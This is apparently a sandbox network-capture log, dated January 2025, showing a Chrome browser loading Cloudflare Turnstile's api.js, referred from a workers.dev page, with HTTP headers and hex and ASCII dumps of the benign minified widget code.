2025-01-14 16:14:04 UTC	591	OUT	GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://5eedab40.shaullerica.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:04 UTC	386	IN	HTTP/1.1 302 Found Date: Tue, 14 Jan 2025 16:14:04 GMT Content-Length: 0 Connection: close access-control-allow-origin: * cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public cross-origin-resource-policy: cross-origin location: /turnstile/v0/b/e0c90b6a3ed1/api.js Server: cloudflare CF-RAY: 901eeabc1adf0f45-EWR alt-svc: h3=":443"; ma=86400

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:04 UTC	575	OUT	GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://5eedab40.shaullerica.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:04 UTC	471	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:14:04 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 47521 Connection: close accept-ranges: bytes last-modified: Wed, 08 Jan 2025 13:42:47 GMT cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public access-control-allow-origin: * cross-origin-resource-policy: cross-origin Server: cloudflare CF-RAY: 901eeabfec030f4a-EWR alt-svc: h3=":443"; ma=86400
2025-01-14 16:14:04 UTC	898	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
2025-01-14 16:14:04 UTC	1369	IN	Data Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
2025-01-14 16:14:04 UTC	1369	IN	Data Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30 Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)\|\|jt(e,r)\|\|zt(e,r)\|\|qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
2025-01-14 16:14:04 UTC	1369	IN	Data Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75 Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
2025-01-14 16:14:04 UTC	1369	IN	Data Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J\|\|(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie\|\|(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X\|\|(X={}));var pe;(fu
2025-01-14 16:14:04 UTC	1369	IN	Data Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
2025-01-14 16:14:04 UTC	1369	IN	Data Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK\|\|e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null\|\|r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null\|\|n===void 0?void
2025-01-14 16:14:04 UTC	1369	IN	Data Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
2025-01-14 16:14:04 UTC	1369	IN	Data Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
2025-01-14 16:14:04 UTC	1369	IN	Data Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:05 UTC	383	OUT	GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:05 UTC	471	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:14:05 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 47521 Connection: close accept-ranges: bytes last-modified: Wed, 08 Jan 2025 13:42:47 GMT cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public access-control-allow-origin: * cross-origin-resource-policy: cross-origin Server: cloudflare CF-RAY: 901eeac43a16de96-EWR alt-svc: h3=":443"; ma=86400
2025-01-14 16:14:05 UTC	1369	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
2025-01-14 16:14:05 UTC	1369	IN	Data Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 75 3d 21 31 2c 67 2c 68 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29 Data Ascii: t(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]\|\|e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
2025-01-14 16:14:05 UTC	1369	IN	Data Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 70 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 70 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 75 3d 70 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 70 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 75 3d 63 2e 72 65 74 75 72 6e 29 26 26 75 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 75 3d 75 2e 63 61 6c 6c 28 63 2c 70 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 75 3b 73 77 69 74 63 68 28 63 3d 30 2c 75 26 26 28 70 3d 5b 70 5b 30 5d 26 32 2c 75 2e 76 61 6c Data Ascii: ])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw\|\|((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.val
2025-01-14 16:14:05 UTC	1369	IN	Data Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 49 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 4f 56 45 52 52 55 4e 3d 22 76 65 72 69 66 79 69 6e 67 2d 6f 76 65 72 72 75 6e 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69 Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe\|\|(Pe={}));var Ie;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.VERIFYING_OVERRUN="verifying-overrun",e.FAILURE_WO_HAVING_TROUBLES="fai
2025-01-14 16:14:05 UTC	1369	IN	Data Raw: 4f 4d 3d 22 63 75 73 74 6f 6d 22 7d 29 28 57 65 7c 7c 28 57 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 63 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 39 65 35 7d 66 75 6e 63 74 69 6f 6e 20 75 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 33 36 65 34 7d 76 61 72 20 49 72 3d 2f 5e 5b 30 2d 39 41 2d 5a 61 2d 7a 5f 2d 5d 7b 33 2c Data Ascii: OM="custom"})(We\|\|(We={}));function M(e,r){return e.indexOf(r)!==-1}function it(e){return M(["auto","dark","light"],e)}function ot(e){return M(["auto","never"],e)}function ct(e){return e>0&&e<9e5}function ut(e){return e>0&&e<36e4}var Ir=/^[0-9A-Za-z_-]{3,
2025-01-14 16:14:05 UTC	1369	IN	Data Raw: 2c 65 72 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 68 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 5f 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 62 74 3d 22 67 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 22 2c 74 72 3d 38 65 33 2c 45 74 3d 22 70 72 69 76 61 74 65 2d 74 6f 6b 65 6e 22 2c 72 72 3d 33 2c 6e 72 3d 35 30 30 2c 61 72 3d 35 30 30 2c 59 3d 22 22 3b 76 61 72 20 4e 72 3d 5b 22 62 67 2d 62 67 22 2c 22 64 61 2d 64 6b 22 2c 22 64 65 2d 64 65 22 2c 22 65 6c 2d 67 72 22 2c 22 6a 61 2d 6a 70 22 2c 22 6d 73 2d 6d 79 22 2c 22 72 75 2d 72 75 22 2c 22 73 6b 2d 73 6b 22 2c 22 73 6c 2d 73 69 22 2c 22 73 72 2d 62 61 22 2c 22 74 6c 2d 70 68 22 2c 22 75 6b 2d 75 61 22 5d 2c 6b Data Ascii: ,er=".g-recaptcha",ht="cf_challenge_response",_t="cf-turnstile-response",bt="g-recaptcha-response",tr=8e3,Et="private-token",rr=3,nr=500,ar=500,Y="";var Nr=["bg-bg","da-dk","de-de","el-gr","ja-jp","ms-my","ru-ru","sk-sk","sl-si","sr-ba","tl-ph","uk-ua"],k
2025-01-14 16:14:05 UTC	1369	IN	Data Raw: 62 6f 73 65 4c 61 6e 67 75 61 67 65 2c 6e 3d 65 2e 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 6e 26 26 72 3f 22 35 34 30 70 78 22 3a 6e 26 26 6f 3f 22 35 30 30 70 78 22 3a 6e 3f 22 34 38 30 70 78 22 3a 72 3f 22 36 35 30 70 78 22 3a 6f 3f 22 35 39 30 70 78 22 3a 22 35 37 30 70 78 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 42 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 65 7d Data Ascii: boseLanguage,n=e.isSmallerFeedback,o=e.isModeratelyVerbose;return n&&r?"540px":n&&o?"500px":n?"480px":r?"650px":o?"590px":"570px"};function Be(e){if(e===void 0)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}
